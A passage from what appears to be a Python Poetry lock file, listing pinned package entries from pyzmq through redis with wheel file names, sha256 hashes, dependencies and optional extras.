"sha256:deee9ca4727f53464daf089536e68b13e6104e84a37820a88b0a057b97bba2d2"}, {file = "pyzmq-25.1.1-pp37-pypy37_pp73-manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:aa8d6cdc8b8aa19ceb319aaa2b660cdaccc533ec477eeb1309e2a291eaacc43a"}, {file = "pyzmq-25.1.1-pp37-pypy37_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:019e59ef5c5256a2c7378f2fb8560fc2a9ff1d315755204295b2eab96b254d0a"}, {file = "pyzmq-25.1.1-pp37-pypy37_pp73-win_amd64.whl", hash = "sha256:b9af3757495c1ee3b5c4e945c1df7be95562277c6e5bccc20a39aec50f826cd0"}, {file = "pyzmq-25.1.1-pp38-pypy38_pp73-macosx_10_9_x86_64.whl", hash = "sha256:548d6482dc8aadbe7e79d1b5806585c8120bafa1ef841167bc9090522b610fa6"}, {file = "pyzmq-25.1.1-pp38-pypy38_pp73-manylinux_2_12_i686.manylinux2010_i686.whl", hash = "sha256:057e824b2aae50accc0f9a0570998adc021b372478a921506fddd6c02e60308e"}, {file = "pyzmq-25.1.1-pp38-pypy38_pp73-manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:2243700cc5548cff20963f0ca92d3e5e436394375ab8a354bbea2b12911b20b0"}, {file = "pyzmq-25.1.1-pp38-pypy38_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:79986f3b4af059777111409ee517da24a529bdbd46da578b33f25580adcff728"}, {file = 
"pyzmq-25.1.1-pp38-pypy38_pp73-win_amd64.whl", hash = "sha256:11d58723d44d6ed4dd677c5615b2ffb19d5c426636345567d6af82be4dff8a55"}, {file = "pyzmq-25.1.1-pp39-pypy39_pp73-macosx_10_9_x86_64.whl", hash = "sha256:49d238cf4b69652257db66d0c623cd3e09b5d2e9576b56bc067a396133a00d4a"}, {file = "pyzmq-25.1.1-pp39-pypy39_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:fedbdc753827cf014c01dbbee9c3be17e5a208dcd1bf8641ce2cd29580d1f0d4"}, {file = "pyzmq-25.1.1-pp39-pypy39_pp73-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:bc16ac425cc927d0a57d242589f87ee093884ea4804c05a13834d07c20db203c"}, {file = "pyzmq-25.1.1-pp39-pypy39_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:11c1d2aed9079c6b0c9550a7257a836b4a637feb334904610f06d70eb44c56d2"}, {file = "pyzmq-25.1.1-pp39-pypy39_pp73-manylinux_2_28_x86_64.whl", hash = "sha256:e8a701123029cc240cea61dd2d16ad57cab4691804143ce80ecd9286b464d180"}, {file = "pyzmq-25.1.1-pp39-pypy39_pp73-win_amd64.whl", hash = "sha256:61706a6b6c24bdece85ff177fec393545a3191eeda35b07aaa1458a027ad1304"}, {file = "pyzmq-25.1.1.tar.gz", hash = "sha256:259c22485b71abacdfa8bf79720cd7bcf4b9d128b30ea554f01ae71fdbfdaa23"}, ] [package.dependencies] cffi = {version = "*", markers = "implementation_name == \"pypy\""} [[package]] name = "qdrant-client" version = "1.6.4" description = "Client library for the Qdrant vector search engine" optional = true python-versions = ">=3.8,<3.13" files = [ {file = "qdrant_client-1.6.4-py3-none-any.whl", hash = "sha256:db4696978d6a62d78ff60f70b912383f1e467bda3053f732b01ddb5f93281b10"}, {file = "qdrant_client-1.6.4.tar.gz", hash = "sha256:bbd65f383b6a55a9ccf4e301250fa925179340dd90cfde9b93ce4230fd68867b"}, ] [package.dependencies] grpcio = ">=1.41.0" grpcio-tools = ">=1.41.0" httpx = {version = ">=0.14.0", extras = ["http2"]} numpy = {version = ">=1.21", markers = "python_version >= \"3.8\" and python_version < \"3.12\""} portalocker = ">=2.7.0,<3.0.0" pydantic = ">=1.10.8" urllib3 = ">=1.26.14,<2.0.0" [package.extras] fastembed = ["fastembed (==0.1.1)"] [[package]] name = "qtconsole" version = "5.4.4" description = "Jupyter Qt console" optional = false python-versions = ">= 3.7" files = [ {file = "qtconsole-5.4.4-py3-none-any.whl", hash = "sha256:a3b69b868e041c2c698bdc75b0602f42e130ffb256d6efa48f9aa756c97672aa"}, {file = "qtconsole-5.4.4.tar.gz", hash = "sha256:b7ffb53d74f23cee29f4cdb55dd6fabc8ec312d94f3c46ba38e1dde458693dfb"}, ] [package.dependencies] ipykernel = ">=4.1" ipython-genutils = "*" jupyter-client = ">=4.1" jupyter-core = "*" packaging = "*" pygments = "*" pyzmq = ">=17.1" qtpy = ">=2.4.0" traitlets = "<5.2.1 || >5.2.1,<5.2.2 || >5.2.2" [package.extras] doc = ["Sphinx (>=1.3)"] test = ["flaky", "pytest", "pytest-qt"] [[package]] name = "qtpy" version = "2.4.1" description = "Provides an abstraction layer on top of the various Qt bindings (PyQt5/6 and PySide2/6)." 
optional = false python-versions = ">=3.7" files = [ {file = "QtPy-2.4.1-py3-none-any.whl", hash = "sha256:1c1d8c4fa2c884ae742b069151b0abe15b3f70491f3972698c683b8e38de839b"}, {file = "QtPy-2.4.1.tar.gz", hash = "sha256:a5a15ffd519550a1361bdc56ffc07fda56a6af7292f17c7b395d4083af632987"}, ] [package.dependencies] packaging = "*" [package.extras] test = ["pytest (>=6,!=7.0.0,!=7.0.1)", "pytest-cov (>=3.0.0)", "pytest-qt"] [[package]] name = "rank-bm25" version = "0.2.2" description = "Various BM25 algorithms for document ranking" optional = true python-versions = "*" files = [ {file = "rank_bm25-0.2.2-py3-none-any.whl", hash = "sha256:7bd4a95571adadfc271746fa146a4bcfd89c0cf731e49c3d1ad863290adbe8ae"}, {file = "rank_bm25-0.2.2.tar.gz", hash = "sha256:096ccef76f8188563419aaf384a02f0ea459503fdf77901378d4fd9d87e5e51d"}, ] [package.dependencies] numpy = "*" [package.extras] dev = ["pytest"] [[package]] name = "rapidfuzz" version = "3.4.0" description = "rapid fuzzy string matching" optional = true python-versions = ">=3.7" files = [ {file = "rapidfuzz-3.4.0-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:1438e68fe8869fe6819a313140e98641b34bfc89234b82486d8fd02044a067e8"}, {file = "rapidfuzz-3.4.0-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:59f851c7a54a9652b9598553547e0940244bfce7c9b672bac728efa0b9028d03"}, {file = "rapidfuzz-3.4.0-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:6286510910fcd649471a7f5b77fcc971e673729e7c84216dbf321bead580d5a1"}, {file = "rapidfuzz-3.4.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:87409e12f9a82aa33a5b845c49dd8d5d4264f2f171f0a69ddc638e100fcc50de"}, {file = "rapidfuzz-3.4.0-cp310-cp310-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:d1d81d380ceabc8297880525c9d8b9e93fead38d3d2254e558c36c18aaf2553f"}, {file = "rapidfuzz-3.4.0-cp310-cp310-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:a716efcfc92659d8695291f07da4fa60f42a131dc4ceab583931452dd5662e92"}, {file = "rapidfuzz-3.4.0-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:83387fb81c4c0234b199110655779762dd5982cdf9de4f7c321110713193133e"}, {file = "rapidfuzz-3.4.0-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:55efb3231bb954f3597313ebdf104289b8d139d5429ad517051855f84e12b94e"}, {file = "rapidfuzz-3.4.0-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:51d47d52c890cbdb2d8b2085d747e557f15efd9c990cb6ae624c8f6948c4aa3a"}, {file = "rapidfuzz-3.4.0-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:3db79070888d0dcd4f6a20fd30b8184dd975d6b0f7818acff5d7e07eba19b71f"}, {file = "rapidfuzz-3.4.0-cp310-cp310-musllinux_1_1_ppc64le.whl", hash = "sha256:46efc5e4675e2bd5118427513f86eaf3689e1482ebd309ad4532bcefae78179d"}, {file = "rapidfuzz-3.4.0-cp310-cp310-musllinux_1_1_s390x.whl", hash = "sha256:d15c364c5aa8f032dadf5b82fa02b7a4bd9688a961a27961cd5b985203f58037"}, {file = "rapidfuzz-3.4.0-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:f1e91460baa42f5408f3c062913456a24b2fc1a181959b58a9c06b5eef700ca6"}, {file = "rapidfuzz-3.4.0-cp310-cp310-win32.whl", hash = "sha256:c7f4f6dac25c120de8845a65a97090658c8a976827ac22b6b86e2a16a60bb820"}, {file = "rapidfuzz-3.4.0-cp310-cp310-win_amd64.whl", hash = "sha256:124578029d926b2be32d60b748be95ee0de6cb2753eb49d6d1d6146269b428b9"}, {file = "rapidfuzz-3.4.0-cp310-cp310-win_arm64.whl", hash = "sha256:3af0384132e79fe6f6370d49347649382e04f689277525903bef84d30f3992fd"}, {file = "rapidfuzz-3.4.0-cp311-cp311-macosx_10_9_universal2.whl", hash = 
"sha256:66ff93b81b382269dc7c2d46c839ce72e2d2331ad46a06321770bc94016fe236"}, {file = "rapidfuzz-3.4.0-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:da2764604a31fd1e3f1cacf226b43a871cc9f28844a3196c2a6b1ba52ae12922"}, {file = "rapidfuzz-3.4.0-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:8eb33895353bfcc33ccf4b4bae837c0afb4eaf20a0361aa6f0800cef12505e91"}, {file = "rapidfuzz-3.4.0-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:ed3da08830c08c8bcd49414cc06b704a760d3067804775facc0df725b52085a4"}, {file = "rapidfuzz-3.4.0-cp311-cp311-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:b38c7021f6114cfacba5717192fb3e1e50053261d49a774e645021a2f77e20a3"}, {file = "rapidfuzz-3.4.0-cp311-cp311-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:f7f5ea97886d2ec7b2b9a8172812a76e1d243f2ce705c2f24baf46f9ef5d3951"}, {file = "rapidfuzz-3.4.0-cp311-cp311-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:5b9a7ab061c1b75b274fc2ebd1d29cfa2e510c36e2f4cd9518a6d56d589003c8"}, {file = "rapidfuzz-3.4.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:23b07685c21c93cdf6d68b49eccacfe975651b8d99ea8a02687400c60315e5bc"}, {file = "rapidfuzz-3.4.0-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:c2a564f748497b6a5e08a1dc0ac06655f65377cf072c4f0e2c73818acc655d36"}, {file = "rapidfuzz-3.4.0-cp311-cp311-musllinux_1_1_i686.whl", hash = "sha256:ef30b5f2720f0acbcfba0e0661a4cc118621c47cf69b5fe92531dfed1e369e1c"}, {file = "rapidfuzz-3.4.0-cp311-cp311-musllinux_1_1_ppc64le.whl", hash = "sha256:ab981f9091ae8bd32bca9289fa1019b4ec656543489e7e13e64882d57d989282"}, {file = "rapidfuzz-3.4.0-cp311-cp311-musllinux_1_1_s390x.whl", hash = "sha256:a80f9aa4245a49e0677896d1b51b2b3bc36472aff7cec31c4a96f789135f03fe"}, {file = "rapidfuzz-3.4.0-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:0d8c6cb80b5d2edf88bf6a88ac6827a353c974405c2d7e3025ed9527a5dbe1a6"}, {file = "rapidfuzz-3.4.0-cp311-cp311-win32.whl", hash = "sha256:c0150d521199277b5ad8bd3b060a5f3c1dbdf11df0533b4d79f458ef11d07e8c"}, {file = "rapidfuzz-3.4.0-cp311-cp311-win_amd64.whl", hash = "sha256:bd50bc90167601963e2a90b820fb862d239ecb096a991bf3ce33ffaa1d6eedee"}, {file = "rapidfuzz-3.4.0-cp311-cp311-win_arm64.whl", hash = "sha256:bd10d68baabb63a3bb36b683f98fc481fcc62230e493e4b31e316bd5b299ef68"}, {file = "rapidfuzz-3.4.0-cp312-cp312-macosx_10_9_universal2.whl", hash = "sha256:7f497f850d46c5e08f3340343842a28ede5d3997e5d1cadbd265793cf47417e5"}, {file = "rapidfuzz-3.4.0-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:a7d6a9f04ea1277add8943d4e144e59215009f54f2668124ff26dee18a875343"}, {file = "rapidfuzz-3.4.0-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:b6fe2aff0d9b35191701714e05afe08f79eaea376a3a6ca802b72d9e5b48b545"}, {file = "rapidfuzz-3.4.0-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:b81b8bc29114ca861fed23da548a837832b85495b0c1b2600e6060e3cf4d50aa"}, {file = "rapidfuzz-3.4.0-cp312-cp312-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:805dc2aa3ac295dcbf2df8c1e420e8a73b1f632d6820a5a1c8506d22c11e0f27"}, {file = "rapidfuzz-3.4.0-cp312-cp312-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:1276c7f50cd90a48b00084feb25256135c9ace6c599295dd5932949ec30c0e70"}, {file = "rapidfuzz-3.4.0-cp312-cp312-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:0b9197656a6d71483959bf7d216e7fb7a6b80ca507433bcb3015fb92abc266f8"}, {file = "rapidfuzz-3.4.0-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = 
"sha256:3456f4df5b8800315fd161045c996479016c112228e4da370d09ed80c24853e5"}, {file = "rapidfuzz-3.4.0-cp312-cp312-musllinux_1_1_aarch64.whl", hash = "sha256:734046d557550589edb83d5ad1468a1341d1092f1c64f26fd0b1fc50f9efdce1"}, {file = "rapidfuzz-3.4.0-cp312-cp312-musllinux_1_1_i686.whl", hash = "sha256:37d5f0fbad6c092c89840eea2c4c845564d40849785de74c5e6ff48b47b0ecf6"}, {file = "rapidfuzz-3.4.0-cp312-cp312-musllinux_1_1_ppc64le.whl", hash = "sha256:bfe14711b9a7b744e242a482c6cabb696517a1a9946fc1e88d353cd3eb384788"}, {file = "rapidfuzz-3.4.0-cp312-cp312-musllinux_1_1_s390x.whl", hash = "sha256:1a733c10b1fcc47f837c23ab4a255cc4021a88939ff81baa64d6738231cba33d"}, {file = "rapidfuzz-3.4.0-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:929e6b71e5b36caee2ee11c209e75a0fcbd716a1b76ae6162b89ee9b591b63b1"}, {file = "rapidfuzz-3.4.0-cp312-cp312-win32.whl", hash = "sha256:c56073ba1d1b25585359ad9769163cb2f3183e7a03c03b914a0667fcbd95dc5c"}, {file = "rapidfuzz-3.4.0-cp312-cp312-win_amd64.whl", hash = "sha256:bf58ba21df06fc8aeef3056fd137eca0a593c2f5c82923a4524d251dc5f3df5d"}, {file = "rapidfuzz-3.4.0-cp312-cp312-win_arm64.whl", hash = "sha256:f3effbe9c677658b3149da0d2778a740a6b7d8190c1407fd0c0770a4e223cfe0"}, {file = "rapidfuzz-3.4.0-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:ed0d5761b44d9dd87278d5c32903bb55632346e4d84ea67ba2e4a84afc3b7d45"}, {file = "rapidfuzz-3.4.0-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:1bafbd3e2e9e0b5f740f66155cc7e1e23eee1e1f2c44eff12daf14f90af0e8ab"}, {file = "rapidfuzz-3.4.0-cp37-cp37m-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:2543fd8d0fb3b1ac065bf94ee54c0ea33343c62481d8e54b6117a88c92c9b721"}, {file = "rapidfuzz-3.4.0-cp37-cp37m-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:93ceb62ade1a0e62696487274002157a58bb751fc82cd25016fc5523ba558ca5"}, {file = "rapidfuzz-3.4.0-cp37-cp37m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:76f4162ce5fe08609455d318936ed4aa709f40784be61fb4e200a378137b0230"}, {file = "rapidfuzz-3.4.0-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:f723197f2dbce508a7030dcf6d3fc940117aa54fc876021bf6f6feeaf3825ba1"}, {file = "rapidfuzz-3.4.0-cp37-cp37m-musllinux_1_1_aarch64.whl", hash = "sha256:cfdc74afd93ac71270b5be5c25cb864b733b9ae32b07495705a6ac294ac4c390"}, {file = "rapidfuzz-3.4.0-cp37-cp37m-musllinux_1_1_i686.whl", hash = "sha256:273c7c7f5b405f2f54d41e805883572d57e1f0a56861f93ca5a6733672088acb"}, {file = "rapidfuzz-3.4.0-cp37-cp37m-musllinux_1_1_ppc64le.whl", hash = "sha256:712dd91d429afaddbf7e86662155f2ad9bc8135fca5803a01035a3c1d76c5977"}, {file = "rapidfuzz-3.4.0-cp37-cp37m-musllinux_1_1_s390x.whl", hash = "sha256:9814905414696080d8448d6e6df788a0148954ab34d7cd8d75bcb85ba30e0b25"}, {file = "rapidfuzz-3.4.0-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:01013ee67fb15608c8c5961af3bc2b1f242cff94c19f53237c9b3f0edb8e0a2d"}, {file = "rapidfuzz-3.4.0-cp37-cp37m-win32.whl", hash = "sha256:8f5d2adc48c181486125d42230e80479a1e0568942e883d1ebdeb76cd3f83470"}, {file = "rapidfuzz-3.4.0-cp37-cp37m-win_amd64.whl", hash = "sha256:c92d847c997c384670e3b4cf6727cb73a4d7a7ba6457310e2083cf06d56013c4"}, {file = "rapidfuzz-3.4.0-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:d0bda173b0ec1fa546f123088c0d42c9096304771b4c0555d4e08a66a246b3f6"}, {file = "rapidfuzz-3.4.0-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:bbb05b1203f683b341f44ebe8fe38afed6e56f606094f9840d6406e4a7bf0eab"}, {file = "rapidfuzz-3.4.0-cp38-cp38-macosx_11_0_arm64.whl", hash = 
"sha256:f0075ff8990437923da42202b60cf04b5c122ee2856f0cf2344fb890cadecf57"}, {file = "rapidfuzz-3.4.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:9f295842c282fe7fe93bfe7a20e78f33f43418f47fb601f2f0a05df8a8282b43"}, {file = "rapidfuzz-3.4.0-cp38-cp38-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:1ebee7313719dfe652debb74bdd4024e8cf381a59adc6d065520ff927f3445f4"}, {file = "rapidfuzz-3.4.0-cp38-cp38-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:f71454249ddd29d8ba5415ed7307e7b7493fc7e9018f1ff496127b8b9a8df94b"}, {file = "rapidfuzz-3.4.0-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:52c6b7a178f0e800488fa1aede17b00f6397cab0b79d48531504b0d89e45315f"}, {file = "rapidfuzz-3.4.0-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:6d38596c804a9f2bd49360c15e1f4afbf016f181fe37fc4f1a4ddd247d3e91e5"}, {file = "rapidfuzz-3.4.0-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:8756461e7ee79723b8f762fc6db226e65eb453bf9fa64b14fc0274d4aaaf9e21"}, {file = "rapidfuzz-3.4.0-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:e14799297f194a4480f373e45142ef16d5dc68a42084c0e2018e0bdba56a8fef"}, {file = "rapidfuzz-3.4.0-cp38-cp38-musllinux_1_1_ppc64le.whl", hash = "sha256:f813fb663d90038c1171d30ea1b6b275e09fced32f1d12b972c6045d9d4233f2"}, {file = "rapidfuzz-3.4.0-cp38-cp38-musllinux_1_1_s390x.whl", hash = "sha256:0df66e07e42e2831fae84dea481f7803bec7cfa53c31d770e86ac47bb18dcd57"}, {file = "rapidfuzz-3.4.0-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:b05c7d4b4ddb617e977d648689013e50e5688140ee03538d3760a3a11d4fa8a2"}, {file = "rapidfuzz-3.4.0-cp38-cp38-win32.whl", hash = "sha256:74b9a1c1fc139d325fb0b89ccc85527d27096a76f6ed690ee3378143cc38e91d"}, {file = "rapidfuzz-3.4.0-cp38-cp38-win_amd64.whl", hash = "sha256:5fe3ef7daecd79f852936528e37528fd88818bc000991e0fea23b9ac5b79e875"}, {file = "rapidfuzz-3.4.0-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:61f16bb0f3026853500e7968261831a2e1a35d56947752bb6cf6953afd70b9de"}, {file = "rapidfuzz-3.4.0-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:d188e8fb5a9709931c6a48cc62c4ac9b9d163969333711e426d9dbd134c1489b"}, {file = "rapidfuzz-3.4.0-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:c006aa481d1b91c2600920ce16e42d208a4b6f318d393aef4dd2172d568f2641"}, {file = "rapidfuzz-3.4.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:02afbe7ed12e9191082ed7bda43398baced1d9d805302b7b010d397de3ae973f"}, {file = "rapidfuzz-3.4.0-cp39-cp39-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:01d64710060bc3241c08ac1f1a9012c7184f3f4c3d6e2eebb16c6093a03f6a67"}, {file = "rapidfuzz-3.4.0-cp39-cp39-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:d3198f70b97127e52a4f96bb2f7de447f89baa338ff398eb126930c8e3137ad1"}, {file = "rapidfuzz-3.4.0-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:50ad7bac98a0f00492687eddda73d2c0bdf71c78b52fddaa5901634ae323d3ce"}, {file = "rapidfuzz-3.4.0-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:cc3efc06db79e818f4a6783a4e001b3c8b2c61bd05c0d5c4d333adaf64ed1b34"}, {file = "rapidfuzz-3.4.0-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:75d1365387ec8ef2128fd7e2f7436aa1a04a1953bc6d7068835bb769cd07c146"}, {file = "rapidfuzz-3.4.0-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:a0750278693525b5ce58d3b313e432dfa5d90f00d06ae54fa8cde87f2a397eb0"}, {file = "rapidfuzz-3.4.0-cp39-cp39-musllinux_1_1_ppc64le.whl", hash = 
"sha256:2e49151572b842d290dcee2cc6f9ce7a7b40b77cc20d0f6d6b54e7afb7bafa5c"}, {file = "rapidfuzz-3.4.0-cp39-cp39-musllinux_1_1_s390x.whl", hash = "sha256:8b38d7677b2f20b137bb7aaf0dcd3d8ac2a2cde65f09f5621bf3f57d9a1e5d6e"}, {file = "rapidfuzz-3.4.0-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:d904ac97f2e370f91e8170802669c8ad68641bf84d742968416b53c5960410c6"}, {file = "rapidfuzz-3.4.0-cp39-cp39-win32.whl", hash = "sha256:53bbef345644eac1c2d7cc21ade4fe9554fa289f60eb2c576f7fdc454dbc0641"}, {file = "rapidfuzz-3.4.0-cp39-cp39-win_amd64.whl", hash = "sha256:233bf022938c38060a93863ec548e624d69a56d7384634d8bea435b915b88e52"}, {file = "rapidfuzz-3.4.0-cp39-cp39-win_arm64.whl", hash = "sha256:63933792146f3d333680d415cecc237e6275b42ad948d0a798f9a81325517666"}, {file = "rapidfuzz-3.4.0-pp37-pypy37_pp73-macosx_10_9_x86_64.whl", hash = "sha256:e182ea5c809e7ed36ebfbcef4bb1808e213d27b33c036007a33bcbb7ba498356"}, {file = "rapidfuzz-3.4.0-pp37-pypy37_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:9e1142c8d35fa6f3af8150d02ff8edcbea3723c851d889e8b2172e0d1b99f3f7"}, {file = "rapidfuzz-3.4.0-pp37-pypy37_pp73-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:6b8258846e56b03230fa733d29bb4f9fb1f4790ac97d1ebe9faa3ff9d2850999"}, {file = "rapidfuzz-3.4.0-pp37-pypy37_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:950d1dfd2927cd45c9bb2927933926718f0a17792841e651d42f4d1cb04a5c1d"}, {file = "rapidfuzz-3.4.0-pp37-pypy37_pp73-win_amd64.whl", hash = "sha256:dd54dd0355225dc3c1d55e233d510adcccee9bb25d656b4cf1136114b92e7bf3"}, {file = "rapidfuzz-3.4.0-pp38-pypy38_pp73-macosx_10_9_x86_64.whl", hash = "sha256:f5921780e7995e9ac3cea41fa57b623159d7295788618d3f2946d61328c25c25"}, {file = "rapidfuzz-3.4.0-pp38-pypy38_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:fc4b1b69a64d337c40fa07a721dae1b1550d90f17973fb348055f6440d597e26"}, {file = "rapidfuzz-3.4.0-pp38-pypy38_pp73-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:6f5c8b901b6d3be63591c68e2612f76ad85af27193d0a88d4d87bb047aeafcb3"}, {file = "rapidfuzz-3.4.0-pp38-pypy38_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:c67f5ced39aff6277dd772b239ef8aa8fc810200a3b42f69ddbb085ea0e18232"}, {file = "rapidfuzz-3.4.0-pp38-pypy38_pp73-win_amd64.whl", hash = "sha256:4fd94acab871afbc845400814134a83512a711e824dc2c9a9776d6123464a221"}, {file = "rapidfuzz-3.4.0-pp39-pypy39_pp73-macosx_10_9_x86_64.whl", hash = "sha256:437508ec1ea6e71a77126715ac6208cb9c3e74272536ebfa79be9dd008cfb85f"}, {file = "rapidfuzz-3.4.0-pp39-pypy39_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:a7215f7c5de912b364d5cf7c4c66915ccf4acf71aafbb8da62ad346569196e15"}, {file = "rapidfuzz-3.4.0-pp39-pypy39_pp73-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:698488002eb7be2f737e48679ed0cd310b76291f26d8ec792db8345d13eb6573"}, {file = "rapidfuzz-3.4.0-pp39-pypy39_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:e77873126eb07e7461f0b675263e6c5d42c8a952e88e4a44eeff96f237b2b024"}, {file = "rapidfuzz-3.4.0-pp39-pypy39_pp73-win_amd64.whl", hash = "sha256:28d03cd33817f6e0bea9b618b460f85ff9c9c3fedc6c19cfa0992f719a0d1801"}, {file = "rapidfuzz-3.4.0.tar.gz", hash = "sha256:a74112e2126b428c77db5e96f7ce34e91e750552147305b2d361122cbede2955"}, ] [package.extras] full = ["numpy"] [[package]] name = "rapidocr-onnxruntime" version = "1.3.7" description = "A cross platform OCR Library based on OnnxRuntime." 
optional = true python-versions = ">=3.6,<3.12" files = [ {file = "rapidocr_onnxruntime-1.3.7-py3-none-any.whl", hash = "sha256:9d061786f6255c57a98f04a2f7624eacabc1d0dede2a69707c99a6dd9024e6fa"}, ] [package.dependencies] numpy = ">=1.19.5" onnxruntime = ">=1.7.0" opencv-python = ">=4.5.1.48" Pillow = "*" pyclipper = ">=1.2.0" PyYAML = "*" Shapely = ">=1.7.1" six = ">=1.15.0" [[package]] name = "ratelimiter" version = "1.2.0.post0" description = "Simple python rate limiting object" optional = true python-versions = "*" files = [ {file = "ratelimiter-1.2.0.post0-py3-none-any.whl", hash = "sha256:a52be07bc0bb0b3674b4b304550f10c769bbb00fead3072e035904474259809f"}, {file = "ratelimiter-1.2.0.post0.tar.gz", hash = "sha256:5c395dcabdbbde2e5178ef3f89b568a3066454a6ddc223b76473dac22f89b4f7"}, ] [package.extras] test = ["pytest (>=3.0)", "pytest-asyncio"] [[package]] name = "rdflib" version = "6.3.2" description = "RDFLib is a Python library for working with RDF, a simple yet powerful language for representing information." optional = true python-versions = ">=3.7,<4.0" files = [ {file = "rdflib-6.3.2-py3-none-any.whl", hash = "sha256:36b4e74a32aa1e4fa7b8719876fb192f19ecd45ff932ea5ebbd2e417a0247e63"}, {file = "rdflib-6.3.2.tar.gz", hash = "sha256:72af591ff704f4caacea7ecc0c5a9056b8553e0489dd4f35a9bc52dbd41522e0"}, ] [package.dependencies] isodate = ">=0.6.0,<0.7.0" pyparsing = ">=2.1.0,<4" [package.extras] berkeleydb = ["berkeleydb (>=18.1.0,<19.0.0)"] html = ["html5lib (>=1.0,<2.0)"] lxml = ["lxml (>=4.3.0,<5.0.0)"] networkx = ["networkx (>=2.0.0,<3.0.0)"] [[package]] name = "redis" version = "4.6.0" description = "Python client for Redis database and key-value store" optional = true python-versions = ">=3.7" files = [ {file = "redis-4.6.0-py3-none-any.whl", hash = "sha256:e2b03db868160ee4591de3cb90d40ebb50a90dd302138775937f6a42b7ed183c"}, {file = "redis-4.6.0.tar.gz", hash = "sha256:585dc516b9eb042a619ef0a39c3d7d55fe81bdb4df09a52c9cdde0d07bf1aa7d"}, ] [package.dependencies] async-timeout = {version = ">=4.0.2", markers = "python_full_version <= \"3.11.2\""} [package.extras] hiredis = ["hiredis (>=1.0.0)"] ocsp = ["cryptography (>=36.0.1)", "pyopenssl (==20.0.1)", "requests (>=2.26.0)"] [[package]] name = "referencing" version = "0.30.2" description = "JSON Referencing + Python" optional = false python-versions = ">=3.8" files = [ 